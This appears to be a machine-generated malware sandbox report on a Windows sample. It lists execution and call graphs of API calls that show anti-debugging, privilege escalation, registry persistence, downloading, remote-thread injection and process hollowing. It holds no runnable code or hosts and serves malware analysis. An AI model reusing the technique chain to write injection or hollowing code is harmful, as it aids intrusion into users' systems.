                                                                                                                                                                                                                                                    execution_graph 762 7ff7821c3360 823 7ff7821c10a0 762->823 767 7ff7821c3380 1043 7ff7821c4168 GetCurrentProcess OpenProcessToken 767->1043 768 7ff7821c3378 ExitProcess 772 7ff7821c339b 773 7ff7821c33b0 772->773 774 7ff7821c33ff 772->774 775 7ff7821c42a8 3 API calls 773->775 777 7ff7821c3450 774->777 778 7ff7821c3414 774->778 776 7ff7821c33bc 775->776 779 7ff7821c33d6 ExitProcess 776->779 780 7ff7821c33c3 776->780 786 7ff7821c34a6 777->786 787 7ff7821c3465 777->787 782 7ff7821c42a8 3 API calls 778->782 781 7ff7821c42a8 3 API calls 780->781 783 7ff7821c33cf 781->783 784 7ff7821c3420 782->784 783->779 785 7ff7821c33de 783->785 788 7ff7821c342f 784->788 789 7ff7821c3427 ExitProcess 784->789 1078 7ff7821c3210 785->1078 1067 7ff7821c3978 786->1067 1058 7ff7821c42a8 CreateMutexA 787->1058 790 7ff7821c3180 21 API calls 788->790 794 7ff7821c3434 790->794 798 7ff7821c3448 ExitProcess 794->798 799 7ff7821c343b Sleep 794->799 796 7ff7821c33e3 801 7ff7821c33ea Sleep 796->801 802 7ff7821c33f7 ExitProcess 796->802 799->794 801->796 803 7ff7821c3480 1062 7ff7821c3180 803->1062 804 7ff7821c3478 ExitProcess 807 7ff7821c3512 7 API calls 808 7ff7821c34be 810 7ff7821c42a8 3 API calls 808->810 809 7ff7821c3485 811 7ff7821c3499 ExitProcess 809->811 812 7ff7821c348c Sleep 809->812 813 7ff7821c34ca 810->813 812->809 814 7ff7821c34d1 813->814 815 7ff7821c34e4 ExitProcess 813->815 816 7ff7821c42a8 3 API calls 814->816 817 7ff7821c34dd 816->817 817->815 818 7ff7821c34ec 817->818 819 7ff7821c3210 51 API calls 818->819 820 7ff7821c34f1 819->820 821 7ff7821c3505 ExitProcess 820->821 822 7ff7821c34f8 Sleep 820->822 822->820 1087 7ff7821c1000 LoadLibraryA GetProcAddress 823->1087 825 7ff7821c1131 1088 7ff7821c1000 LoadLibraryA GetProcAddress 825->1088 827 7ff7821c114b 1089 7ff7821c1050 LoadLibraryA GetProcAddress 827->1089 829 7ff7821c1165 1090 7ff7821c1050 LoadLibraryA GetProcAddress 829->1090 831 7ff7821c117f 1091 7ff7821c1050 LoadLibraryA GetProcAddress 831->1091 833 7ff7821c1199 1092 7ff7821c1050 LoadLibraryA GetProcAddress 833->1092 835 7ff7821c11b3 1093 7ff7821c1050 LoadLibraryA GetProcAddress 835->1093 837 7ff7821c11cd 1094 7ff7821c1050 LoadLibraryA GetProcAddress 837->1094 839 7ff7821c11e7 1095 7ff7821c1050 LoadLibraryA GetProcAddress 839->1095 841 7ff7821c1201 1096 7ff7821c1050 LoadLibraryA GetProcAddress 841->1096 843 7ff7821c121b 1097 7ff7821c1050 LoadLibraryA GetProcAddress 843->1097 845 7ff7821c1235 1098 7ff7821c1050 LoadLibraryA GetProcAddress 845->1098 847 7ff7821c124f 1099 7ff7821c1050 LoadLibraryA GetProcAddress 847->1099 849 7ff7821c1269 1100 7ff7821c1050 LoadLibraryA GetProcAddress 849->1100 851 7ff7821c1283 1101 7ff7821c1050 LoadLibraryA GetProcAddress 851->1101 853 7ff7821c129d 1102 7ff7821c1050 LoadLibraryA GetProcAddress 853->1102 855 7ff7821c12b7 1103 7ff7821c1050 LoadLibraryA GetProcAddress 855->1103 857 7ff7821c12d1 1104 7ff7821c1050 LoadLibraryA GetProcAddress 857->1104 859 7ff7821c12eb 1105 7ff7821c1050 LoadLibraryA GetProcAddress 859->1105 861 7ff7821c1305 1106 7ff7821c1050 LoadLibraryA GetProcAddress 861->1106 863 7ff7821c131f 1107 7ff7821c1050 LoadLibraryA GetProcAddress 863->1107 865 7ff7821c1339 1108 7ff7821c1050 LoadLibraryA GetProcAddress 865->1108 867 7ff7821c1353 1109 7ff7821c1050 LoadLibraryA GetProcAddress 867->1109 869 7ff7821c136d 1110 7ff7821c1050 LoadLibraryA GetProcAddress 869->1110 871 7ff7821c1387 1111 7ff7821c1050 LoadLibraryA GetProcAddress 871->1111 873 7ff7821c13a1 1112 7ff7821c1050 LoadLibraryA GetProcAddress 873->1112 875 7ff7821c13bb 1113 7ff7821c1050 LoadLibraryA GetProcAddress 875->1113 877 7ff7821c13d5 1114 7ff7821c1050 LoadLibraryA GetProcAddress 877->1114 879 7ff7821c13ef 1115 7ff7821c1050 LoadLibraryA GetProcAddress 879->1115 881 7ff7821c1409 1116 7ff7821c1050 LoadLibraryA GetProcAddress 881->1116 883 7ff7821c1423 1117 7ff7821c1050 LoadLibraryA GetProcAddress 883->1117 885 7ff7821c143d 1118 7ff7821c1050 LoadLibraryA GetProcAddress 885->1118 887 7ff7821c1457 1119 7ff7821c1050 LoadLibraryA GetProcAddress 887->1119 889 7ff7821c1471 1120 7ff7821c1050 LoadLibraryA GetProcAddress 889->1120 891 7ff7821c148b 1121 7ff7821c1050 LoadLibraryA GetProcAddress 891->1121 893 7ff7821c14a5 1122 7ff7821c1050 LoadLibraryA GetProcAddress 893->1122 895 7ff7821c14bf 1123 7ff7821c1050 LoadLibraryA GetProcAddress 895->1123 897 7ff7821c14d9 1124 7ff7821c1050 LoadLibraryA GetProcAddress 897->1124 899 7ff7821c14f3 1125 7ff7821c1050 LoadLibraryA GetProcAddress 899->1125 901 7ff7821c150d 1126 7ff7821c1050 LoadLibraryA GetProcAddress 901->1126 903 7ff7821c1527 1127 7ff7821c1050 LoadLibraryA GetProcAddress 903->1127 905 7ff7821c1541 1128 7ff7821c1050 LoadLibraryA GetProcAddress 905->1128 907 7ff7821c155b 1129 7ff7821c1050 LoadLibraryA GetProcAddress 907->1129 909 7ff7821c1575 1130 7ff7821c1050 LoadLibraryA GetProcAddress 909->1130 911 7ff7821c158f 1131 7ff7821c1050 LoadLibraryA GetProcAddress 911->1131 913 7ff7821c15a9 1132 7ff7821c1050 LoadLibraryA GetProcAddress 913->1132 915 7ff7821c15c3 1133 7ff7821c1050 LoadLibraryA GetProcAddress 915->1133 917 7ff7821c15dd 1134 7ff7821c1050 LoadLibraryA GetProcAddress 917->1134 919 7ff7821c15f7 1135 7ff7821c1050 LoadLibraryA GetProcAddress 919->1135 921 7ff7821c1611 1136 7ff7821c1050 LoadLibraryA GetProcAddress 921->1136 923 7ff7821c162b 1137 7ff7821c1050 LoadLibraryA GetProcAddress 923->1137 925 7ff7821c1645 1138 7ff7821c1050 LoadLibraryA GetProcAddress 925->1138 927 7ff7821c165f 1139 7ff7821c1050 LoadLibraryA GetProcAddress 927->1139 929 7ff7821c1679 1140 7ff7821c1050 LoadLibraryA GetProcAddress 929->1140 931 7ff7821c1693 1141 7ff7821c1050 LoadLibraryA GetProcAddress 931->1141 933 7ff7821c16ad 1142 7ff7821c1050 LoadLibraryA GetProcAddress 933->1142 935 7ff7821c16c7 1143 7ff7821c1050 LoadLibraryA GetProcAddress 935->1143 937 7ff7821c16e1 1144 7ff7821c1050 LoadLibraryA GetProcAddress 937->1144 939 7ff7821c16fb 1145 7ff7821c1050 LoadLibraryA GetProcAddress 939->1145 941 7ff7821c1715 1146 7ff7821c1050 LoadLibraryA GetProcAddress 941->1146 943 7ff7821c172f 1147 7ff7821c1050 LoadLibraryA GetProcAddress 943->1147 945 7ff7821c1749 1148 7ff7821c1050 LoadLibraryA GetProcAddress 945->1148 947 7ff7821c1763 1149 7ff7821c1050 LoadLibraryA GetProcAddress 947->1149 949 7ff7821c177d 1150 7ff7821c1050 LoadLibraryA GetProcAddress 949->1150 951 7ff7821c1797 1151 7ff7821c1050 LoadLibraryA GetProcAddress 951->1151 953 7ff7821c17b1 1152 7ff7821c1050 LoadLibraryA GetProcAddress 953->1152 955 7ff7821c17cb 1153 7ff7821c1050 LoadLibraryA GetProcAddress 955->1153 957 7ff7821c17e5 1154 7ff7821c1050 LoadLibraryA GetProcAddress 957->1154 959 7ff7821c17ff 1155 7ff7821c1050 LoadLibraryA GetProcAddress 959->1155 961 7ff7821c1819 1156 7ff7821c1050 LoadLibraryA GetProcAddress 961->1156 963 7ff7821c1833 1157 7ff7821c1050 LoadLibraryA GetProcAddress 963->1157 965 7ff7821c184d 1158 7ff7821c1050 LoadLibraryA GetProcAddress 965->1158 967 7ff7821c1867 1159 7ff7821c1050 LoadLibraryA GetProcAddress 967->1159 969 7ff7821c1881 1160 7ff7821c1050 LoadLibraryA GetProcAddress 969->1160 971 7ff7821c189b 1161 7ff7821c1050 LoadLibraryA GetProcAddress 971->1161 973 7ff7821c18b5 1162 7ff7821c1050 LoadLibraryA GetProcAddress 973->1162 975 7ff7821c18cf 1163 7ff7821c1050 LoadLibraryA GetProcAddress 975->1163 977 7ff7821c18e9 1164 7ff7821c1050 LoadLibraryA GetProcAddress 977->1164 979 7ff7821c1903 1165 7ff7821c1050 LoadLibraryA GetProcAddress 979->1165 981 7ff7821c191d 1166 7ff7821c1050 LoadLibraryA GetProcAddress 981->1166 983 7ff7821c1937 1167 7ff7821c1050 LoadLibraryA GetProcAddress 983->1167 985 7ff7821c1951 1168 7ff7821c1050 LoadLibraryA GetProcAddress 985->1168 987 7ff7821c196b 1169 7ff7821c1050 LoadLibraryA GetProcAddress 987->1169 989 7ff7821c1985 1170 7ff7821c1050 LoadLibraryA GetProcAddress 989->1170 991 7ff7821c199f 1171 7ff7821c1050 LoadLibraryA GetProcAddress 991->1171 993 7ff7821c19b9 1172 7ff7821c1050 LoadLibraryA GetProcAddress 993->1172 995 7ff7821c19d3 1173 7ff7821c1050 LoadLibraryA GetProcAddress 995->1173 997 7ff7821c19ed 1174 7ff7821c1050 LoadLibraryA GetProcAddress 997->1174 999 7ff7821c1a07 1175 7ff7821c1050 LoadLibraryA GetProcAddress 999->1175 1001 7ff7821c1a21 1176 7ff7821c1050 LoadLibraryA GetProcAddress 1001->1176 1003 7ff7821c1a3b 1177 7ff7821c1050 LoadLibraryA GetProcAddress 1003->1177 1005 7ff7821c1a55 1178 7ff7821c1050 LoadLibraryA GetProcAddress 1005->1178 1007 7ff7821c1a6f 1179 7ff7821c1050 LoadLibraryA GetProcAddress 1007->1179 1009 7ff7821c1a89 1180 7ff7821c1050 LoadLibraryA GetProcAddress 1009->1180 1011 7ff7821c1aa3 1181 7ff7821c1000 LoadLibraryA GetProcAddress 1011->1181 1013 7ff7821c1abd 1182 7ff7821c1050 LoadLibraryA GetProcAddress 1013->1182 1015 7ff7821c1ad7 1183 7ff7821c1050 LoadLibraryA GetProcAddress 1015->1183 1017 7ff7821c1af1 1184 7ff7821c1050 LoadLibraryA GetProcAddress 1017->1184 1019 7ff7821c1b0b 1185 7ff7821c1050 LoadLibraryA GetProcAddress 1019->1185 1021 7ff7821c1b25 1186 7ff7821c1050 LoadLibraryA GetProcAddress 1021->1186 1023 7ff7821c1b3f 1187 7ff7821c1050 LoadLibraryA GetProcAddress 1023->1187 1025 7ff7821c1b59 1188 7ff7821c1050 LoadLibraryA GetProcAddress 1025->1188 1027 7ff7821c1b73 1189 7ff7821c1050 LoadLibraryA GetProcAddress 1027->1189 1029 7ff7821c1b8d 1190 7ff7821c1050 LoadLibraryA GetProcAddress 1029->1190 1031 7ff7821c1ba7 1191 7ff7821c1050 LoadLibraryA GetProcAddress 1031->1191 1033 7ff7821c1bc1 1192 7ff7821c1050 LoadLibraryA GetProcAddress 1033->1192 1035 7ff7821c1bdb 1193 7ff7821c1050 LoadLibraryA GetProcAddress 1035->1193 1037 7ff7821c1bf5 1194 7ff7821c1050 LoadLibraryA GetProcAddress 1037->1194 1039 7ff7821c1c0f 1040 7ff7821c3120 IsDebuggerPresent 1039->1040 1041 7ff7821c3132 GetCurrentProcess CheckRemoteDebuggerPresent 1040->1041 1042 7ff7821c312e 1040->1042 1041->1042 1042->767 1042->768 1044 7ff7821c3385 1043->1044 1045 7ff7821c418e GetTokenInformation 1043->1045 1054 7ff7821c3be8 GetModuleFileNameW 1044->1054 1195 7ff7821c3a58 VirtualAlloc 1045->1195 1047 7ff7821c41bf GetTokenInformation 1048 7ff7821c4206 AdjustTokenPrivileges CloseHandle 1047->1048 1049 7ff7821c41ec CloseHandle 1047->1049 1196 7ff7821c3a28 1048->1196 1050 7ff7821c3a28 VirtualFree 1049->1050 1051 7ff7821c4201 1050->1051 1051->1044 1055 7ff7821c3cd6 wcsncpy 1054->1055 1056 7ff7821c3c13 PathFindFileNameW wcslen 1054->1056 1057 7ff7821c3c4d 1055->1057 1056->1057 1057->772 1059 7ff7821c3471 1058->1059 1060 7ff7821c42d4 GetLastError 1058->1060 1059->803 1059->804 1060->1059 1061 7ff7821c42e1 CloseHandle 1060->1061 1061->1059 1199 7ff7821c37c8 1062->1199 1064 7ff7821c3190 1202 7ff7821c43b8 CreateFileW 1064->1202 1068 7ff7821c3648 3 API calls 1067->1068 1069 7ff7821c39a3 1068->1069 1070 7ff7821c37c8 11 API calls 1069->1070 1071 7ff7821c39ad GetModuleFileNameW DeleteFileW CopyFileW 1070->1071 1072 7ff7821c39ef SetFileAttributesW 1071->1072 1073 7ff7821c34ab 1071->1073 1219 7ff7821c38b8 RegOpenKeyExW 1072->1219 1076 7ff7821c32f0 GetVersionExW 1073->1076 1077 7ff7821c3321 1076->1077 1077->807 1077->808 1079 7ff7821c37c8 11 API calls 1078->1079 1080 7ff7821c3221 1079->1080 1222 7ff7821c1c20 1080->1222 1082 7ff7821c323b 1083 7ff7821c327d 1082->1083 1239 7ff7821c3fc8 1082->1239 1083->796 1087->825 1088->827 1089->829 1090->831 1091->833 1092->835 1093->837 1094->839 1095->841 1096->843 1097->845 1098->847 1099->849 1100->851 1101->853 1102->855 1103->857 1104->859 1105->861 1106->863 1107->865 1108->867 1109->869 1110->871 1111->873 1112->875 1113->877 1114->879 1115->881 1116->883 1117->885 1118->887 1119->889 1120->891 1121->893 1122->895 1123->897 1124->899 1125->901 1126->903 1127->905 1128->907 1129->909 1130->911 1131->913 1132->915 1133->917 1134->919 1135->921 1136->923 1137->925 1138->927 1139->929 1140->931 1141->933 1142->935 1143->937 1144->939 1145->941 1146->943 1147->945 1148->947 1149->949 1150->951 1151->953 1152->955 1153->957 1154->959 1155->961 1156->963 1157->965 1158->967 1159->969 1160->971 1161->973 1162->975 1163->977 1164->979 1165->981 1166->983 1167->985 1168->987 1169->989 1170->991 1171->993 1172->995 1173->997 1174->999 1175->1001 1176->1003 1177->1005 1178->1007 1179->1009 1180->1011 1181->1013 1182->1015 1183->1017 1184->1019 1185->1021 1186->1023 1187->1025 1188->1027 1189->1029 1190->1031 1191->1033 1192->1035 1193->1037 1194->1039 1195->1047 1197 7ff7821c3a39 VirtualFree 1196->1197 1198 7ff7821c3a4c 1196->1198 1197->1198 1198->1044 1208 7ff7821c3648 GetWindowsDirectoryW 1199->1208 1201 7ff7821c37f7 8 API calls 1201->1064 1203 7ff7821c442f GetLastError 1202->1203 1204 7ff7821c440e 1202->1204 1206 7ff7821c31a3 CreateThread Sleep CreateThread 1203->1206 1213 7ff7821c4308 GetFileSize 1204->1213 1206->809 1209 7ff7821c3692 1208->1209 1210 7ff7821c369c GetVolumeInformationW 1208->1210 1209->1210 1211 7ff7821c3718 1210->1211 1212 7ff7821c3782 wsprintfW 1211->1212 1212->1201 1218 7ff7821c3a58 VirtualAlloc 1213->1218 1215 7ff7821c4334 1216 7ff7821c437e CloseHandle 1215->1216 1217 7ff7821c4348 SetFilePointer ReadFile 1215->1217 1216->1206 1217->1216 1218->1215 1220 7ff7821c38fd RegSetValueExW RegCloseKey 1219->1220 1221 7ff7821c38f9 1219->1221 1220->1221 1221->1073 1223 7ff7821c1c4a InternetOpenW 1222->1223 1224 7ff7821c1c84 InternetOpenUrlW 1223->1224 1225 7ff7821c1c77 Sleep 1223->1225 1226 7ff7821c1d0d HttpQueryInfoA 1224->1226 1227 7ff7821c1cbb InternetOpenUrlW 1224->1227 1225->1223 1229 7ff7821c1d62 1226->1229 1230 7ff7821c1d3c InternetCloseHandle InternetCloseHandle Sleep 1226->1230 1227->1226 1228 7ff7821c1cf2 InternetCloseHandle Sleep 1227->1228 1228->1223 1231 7ff7821c1dc9 HttpQueryInfoA GetProcessHeap HeapAlloc 1229->1231 1232 7ff7821c1d6c InternetCloseHandle InternetOpenUrlW 1229->1232 1230->1223 1234 7ff7821c1e2e InternetCloseHandle InternetCloseHandle 1231->1234 1238 7ff7821c1e48 1231->1238 1232->1231 1233 7ff7821c1dae InternetCloseHandle Sleep 1232->1233 1233->1223 1235 7ff7821c1ec7 1234->1235 1235->1082 1236 7ff7821c1e50 InternetReadFile 1237 7ff7821c1e9e InternetCloseHandle InternetCloseHandle 1236->1237 1236->1238 1237->1235 1238->1236 1238->1237 1254 7ff7821c3f08 CreateToolhelp32Snapshot 1239->1254 1242 7ff7821c3fe8 1243 7ff7821c404f GetCurrentProcess OpenProcessToken 1242->1243 1244 7ff7821c40c6 OpenProcess 1243->1244 1245 7ff7821c406c LookupPrivilegeValueW 1243->1245 1246 7ff7821c40e8 1244->1246 1250 7ff7821c40f2 1244->1250 1247 7ff7821c4094 AdjustTokenPrivileges 1245->1247 1248 7ff7821c40bb CloseHandle 1245->1248 1251 7ff7821c4153 1246->1251 1252 7ff7821c4148 CloseHandle 1246->1252 1247->1248 1248->1244 1250->1246 1253 7ff7821c4126 WaitForSingleObject 1250->1253 1261 7ff7821c2bfc 1250->1261 1251->1083 1252->1251 1253->1243 1253->1246 1255 7ff7821c3268 1254->1255 1256 7ff7821c3f43 Process32FirstW 1254->1256 1255->1242 1257 7ff7821c3f62 wcscmp 1256->1257 1258 7ff7821c3f9d CloseHandle 1256->1258 1259 7ff7821c3f86 Process32NextW 1257->1259 1260 7ff7821c3f79 1257->1260 1258->1255 1259->1257 1259->1258 1260->1258 1262 7ff7821c2c4f 1261->1262 1264 7ff7821c2c91 VirtualAllocEx 1262->1264 1266 7ff7821c2c6f 1262->1266 1269 7ff7821c29cc 1262->1269 1265 7ff7821c2ccb WriteProcessMemory 1264->1265 1264->1266 1265->1266 1267 7ff7821c2d14 VirtualProtectEx 1265->1267 1266->1250 1267->1266 1268 7ff7821c2d47 CreateRemoteThread 1267->1268 1268->1262 1268->1266 1270 7ff7821c2a45 1269->1270 1271 7ff7821c2b4e StrStrA 1270->1271 1272 7ff7821c2a4c 1270->1272 1271->1270 1271->1272 1272->1262 1273 7ff7821c32b0 1276 7ff7821c1f8c GetModuleFileNameW 1273->1276 1277 7ff7821c200d 1276->1277 1285 7ff7821c2008 1276->1285 1278 7ff7821c2061 1277->1278 1279 7ff7821c204b 1277->1279 1319 7ff7821c1ecc ExpandEnvironmentStringsW 1278->1319 1281 7ff7821c207f 1279->1281 1282 7ff7821c2055 1279->1282 1320 7ff7821c1f0c ExpandEnvironmentStringsW 1281->1320 1282->1285 1321 7ff7821c1f4c ExpandEnvironmentStringsW 1282->1321 1283 7ff7821c2076 1283->1285 1287 7ff7821c20d1 CreateProcessW 1283->1287 1287->1285 1288 7ff7821c212c CreateFileW 1287->1288 1288->1285 1289 7ff7821c2173 GetFileSize 1288->1289 1290 7ff7821c2191 1289->1290 1291 7ff7821c219b CloseHandle 1289->1291 1290->1291 1292 7ff7821c21ab VirtualAlloc 1290->1292 1291->1285 1293 7ff7821c21e5 ReadFile 1292->1293 1294 7ff7821c21d5 CloseHandle 1292->1294 1295 7ff7821c2212 VirtualFree CloseHandle 1293->1295 1296 7ff7821c2235 CloseHandle GetThreadContext 1293->1296 1294->1285 1295->1285 1297 7ff7821c2285 VirtualFree 1296->1297 1298 7ff7821c229d ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 1296->1298 1297->1285 1299 7ff7821c2324 VirtualFree 1298->1299 1300 7ff7821c233c VirtualAllocEx 1298->1300 1299->1285 1301 7ff7821c23bf WriteProcessMemory 1300->1301 1302 7ff7821c23a7 VirtualFree 1300->1302 1303 7ff7821c23f5 VirtualFree 1301->1303 1305 7ff7821c240d 1301->1305 1302->1285 1303->1285 1304 7ff7821c2443 WriteProcessMemory 1304->1305 1306 7ff7821c24ce VirtualFree 1304->1306 1305->1304 1311 7ff7821c24eb 1305->1311 1306->1285 1307 7ff7821c255d RtlCompareMemory 1307->1311 1315 7ff7821c25b0 1307->1315 1308 7ff7821c27dc WriteProcessMemory SetThreadContext 1309 7ff7821c2862 VirtualFree 1308->1309 1310 7ff7821c2877 ResumeThread 1308->1310 1309->1285 1312 7ff7821c2889 VirtualFree 1310->1312 1313 7ff7821c289e VirtualFree 1310->1313 1311->1307 1311->1308 1312->1285 1313->1285 1314 7ff7821c27d7 1314->1308 1315->1314 1316 7ff7821c26e0 ReadProcessMemory WriteProcessMemory 1315->1316 1317 7ff7821c27b5 VirtualFree 1316->1317 1318 7ff7821c27cd 1316->1318 1317->1285 1318->1315 1319->1283 1320->1283 1321->1283 1322 7ff7821c3290 1323 7ff7821c1f8c 37 API calls 1322->1323 1324 7ff7821c32a0 1323->1324 1328 7ff7821c2fe0 1333 7ff7821c2fe9 1328->1333 1329 7ff7821c30d5 1332 7ff7821c3b28 RegDeleteKeyW 1332->1333 1333->1329 1333->1332 1334 7ff7821c3d28 9 API calls 1333->1334 1335 7ff7821c38b8 3 API calls 1333->1335 1337 7ff7821c44c8 CreateFileW 1333->1337 1342 7ff7821c3a88 RegOpenKeyExW 1333->1342 1334->1333 1336 7ff7821c30c5 Sleep 1335->1336 1336->1333 1338 7ff7821c4523 1337->1338 1339 7ff7821c455e 1337->1339 1345 7ff7821c4448 SetFilePointer WriteFile SetEndOfFile 1338->1345 1339->1333 1341 7ff7821c453f SetFileAttributesW CloseHandle 1341->1339 1343 7ff7821c3b16 1342->1343 1344 7ff7821c3adc RegSetValueExW RegCloseKey 1342->1344 1343->1333 1344->1343 1345->1341 1346 7ff7821c2ed0 1347 7ff7821c1c20 22 API calls 1346->1347 1348 7ff7821c2f04 1347->1348 1349 7ff7821c3fc8 5 API calls 1348->1349 1350 7ff7821c2f27 1349->1350 1351 7ff7821c3fe8 13 API calls 1350->1351 1352 7ff7821c2f3c GetProcessHeap HeapFree 1351->1352 1353 7ff7821c2db0 1354 7ff7821c37c8 11 API calls 1353->1354 1355 7ff7821c2dc0 1354->1355 1360 7ff7821c4808 CreateFileW 1355->1360 1358 7ff7821c4808 17 API calls 1359 7ff7821c2e11 1358->1359 1361 7ff7821c2deb 1360->1361 1362 7ff7821c486e GetFileSize GetProcessHeap HeapAlloc 1360->1362 1361->1358 1363 7ff7821c48c9 ReadFile 1362->1363 1364 7ff7821c48b7 CloseHandle 1362->1364 1365 7ff7821c48f0 GetProcessHeap HeapFree CloseHandle 1363->1365 1366 7ff7821c4918 1363->1366 1364->1361 1365->1361 1367 7ff7821c4931 GetProcessHeap HeapFree CloseHandle 1366->1367 1369 7ff7821c4959 1366->1369 1367->1361 1368 7ff7821c4b03 GetProcessHeap HeapFree CloseHandle 1368->1361 1369->1368 1370 7ff7821c4a14 GetProcessHeap HeapAlloc 1369->1370 1371 7ff7821c4a61 1369->1371 1370->1371 1371->1368 1372 7ff7821c30f0 1373 7ff7821c30f9 1372->1373 1374 7ff7821c3112 1373->1374 1377 7ff7821c2f70 1373->1377 1382 7ff7821c2e30 CreateMutexA 1377->1382 1380 7ff7821c2fd0 Sleep 1380->1373 1381 7ff7821c2f8b Sleep CreateThread WaitForSingleObject 1381->1380 1383 7ff7821c2e79 GetLastError 1382->1383 1384 7ff7821c2e5c ReleaseMutex CloseHandle 1382->1384 1386 7ff7821c2e86 ReleaseMutex CloseHandle 1383->1386 1387 7ff7821c2ea3 ReleaseMutex CloseHandle 1383->1387 1385 7ff7821c2ebb 1384->1385 1385->1380 1385->1381 1386->1385 1387->1385 1388 7ff7821c49bf 1391 7ff7821c49cf 1388->1391 1389 7ff7821c4b03 GetProcessHeap HeapFree CloseHandle 1390 7ff7821c4b29 1389->1390 1391->1389 1392 7ff7821c4a14 GetProcessHeap HeapAlloc 1391->1392 1393 7ff7821c4a61 1391->1393 1392->1393 1393->1389

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                                    callgraph 0 Function_00007FF7821C49BF 21 Function_00007FF7821C4798 0->21 32 Function_00007FF7821C4578 0->32 1 Function_00007FF7821C38B8 2 Function_00007FF7821C43B8 39 Function_00007FF7821C4308 2->39 3 Function_00007FF7821C28BC 4 Function_00007FF7821C2ED0 10 Function_00007FF7821C3FC8 4->10 18 Function_00007FF7821C1C20 4->18 52 Function_00007FF7821C3B68 4->52 55 Function_00007FF7821C3FE8 4->55 5 Function_00007FF7821C1050 6 Function_00007FF7821C32D0 42 Function_00007FF7821C1F8C 6->42 7 Function_00007FF7821C3648 20 Function_00007FF7821C3618 7->20 8 Function_00007FF7821C4448 9 Function_00007FF7821C37C8 9->7 38 Function_00007FF7821C3F08 10->38 11 Function_00007FF7821C44C8 11->8 12 Function_00007FF7821C1F4C 13 Function_00007FF7821C29CC 13->3 14 Function_00007FF7821C1ECC 15 Function_00007FF7821C34A1 16 Function_00007FF7821C3120 17 Function_00007FF7821C10A0 17->5 30 Function_00007FF7821C1000 17->30 19 Function_00007FF7821C3E18 22 Function_00007FF7821C2E30 23 Function_00007FF7821C32B0 23->42 24 Function_00007FF7821C2DB0 24->9 40 Function_00007FF7821C4808 24->40 25 Function_00007FF7821C3D28 26 Function_00007FF7821C3B28 27 Function_00007FF7821C3A28 28 Function_00007FF7821C42A8 29 Function_00007FF7821C3180 29->2 29->9 31 Function_00007FF7821C3600 33 Function_00007FF7821C3978 33->1 33->7 33->9 34 Function_00007FF7821C2BFC 34->13 35 Function_00007FF7821C3290 35->42 36 Function_00007FF7821C3210 36->9 36->10 36->18 36->52 36->55 37 Function_00007FF7821C3A88 46 Function_00007FF7821C3A58 39->46 40->21 40->32 41 Function_00007FF7821C350D 42->12 42->14 43 Function_00007FF7821C1F0C 42->43 44 Function_00007FF7821C3360 44->16 44->17 44->19 44->28 44->29 44->33 44->36 49 Function_00007FF7821C32F0 44->49 53 Function_00007FF7821C4168 44->53 54 Function_00007FF7821C3BE8 44->54 45 Function_00007FF7821C2FE0 45->1 45->11 45->25 45->26 45->37 47 Function_00007FF7821C35DC 48 Function_00007FF7821C2F70 48->22 50 Function_00007FF7821C30F0 50->48 51 Function_00007FF7821C35F0 53->27 53->46 55->34

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF7821C1F8C Relevance: 66.9, APIs: 34, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 217 7ff7821c1f8c-7ff7821c2006 GetModuleFileNameW 218 7ff7821c2008 217->218 219 7ff7821c200d-7ff7821c2049 217->219 220 7ff7821c28b1-7ff7821c28b9 218->220 221 7ff7821c2061-7ff7821c207d call 7ff7821c1ecc 219->221 222 7ff7821c204b-7ff7821c2053 219->222 231 7ff7821c20c0-7ff7821c20ca 221->231 224 7ff7821c207f-7ff7821c209b call 7ff7821c1f0c 222->224 225 7ff7821c2055-7ff7821c205d 222->225 224->231 228 7ff7821c205f-7ff7821c20bb 225->228 229 7ff7821c209d-7ff7821c20b9 call 7ff7821c1f4c 225->229 228->220 229->231 235 7ff7821c20d1-7ff7821c2125 CreateProcessW 231->235 236 7ff7821c20cc 231->236 237 7ff7821c2127 235->237 238 7ff7821c212c-7ff7821c216c CreateFileW 235->238 236->220 237->220 239 7ff7821c2173-7ff7821c218f GetFileSize 238->239 240 7ff7821c216e 238->240 241 7ff7821c2191-7ff7821c2199 239->241 242 7ff7821c219b-7ff7821c21a6 CloseHandle 239->242 240->220 241->242 243 7ff7821c21ab-7ff7821c21d3 VirtualAlloc 241->243 242->220 244 7ff7821c21e5-7ff7821c2210 ReadFile 243->244 245 7ff7821c21d5-7ff7821c21e0 CloseHandle 243->245 246 7ff7821c2212-7ff7821c2230 VirtualFree CloseHandle 244->246 247 7ff7821c2235-7ff7821c2283 CloseHandle GetThreadContext 244->247 245->220 246->220 248 7ff7821c2285-7ff7821c2298 VirtualFree 247->248 249 7ff7821c229d-7ff7821c2322 ReadProcessMemory GetModuleHandleA GetProcAddress NtUnmapViewOfSection 247->249 248->220 250 7ff7821c2324-7ff7821c2337 VirtualFree 249->250 251 7ff7821c233c-7ff7821c23a5 VirtualAllocEx 249->251 250->220 252 7ff7821c23bf-7ff7821c23f3 WriteProcessMemory 251->252 253 7ff7821c23a7-7ff7821c23ba VirtualFree 251->253 254 7ff7821c23f5-7ff7821c2408 VirtualFree 252->254 255 7ff7821c240d-7ff7821c2418 252->255 253->220 254->220 256 7ff7821c242a-7ff7821c243d 255->256 257 7ff7821c2443-7ff7821c24cc WriteProcessMemory 256->257 258 7ff7821c24eb-7ff7821c2532 256->258 259 7ff7821c24e6 257->259 260 7ff7821c24ce-7ff7821c24e1 VirtualFree 257->260 261 7ff7821c2544-7ff7821c2557 258->261 259->256 260->220 263 7ff7821c255d-7ff7821c25ac RtlCompareMemory 261->263 264 7ff7821c27dc-7ff7821c2860 WriteProcessMemory SetThreadContext 261->264 265 7ff7821c25b0-7ff7821c25d9 263->265 266 7ff7821c25ae 263->266 267 7ff7821c2862-7ff7821c2875 VirtualFree 264->267 268 7ff7821c2877-7ff7821c2887 ResumeThread 264->268 270 7ff7821c25e4-7ff7821c25f2 265->270 266->261 267->220 271 7ff7821c2889-7ff7821c289c VirtualFree 268->271 272 7ff7821c289e-7ff7821c28ab VirtualFree 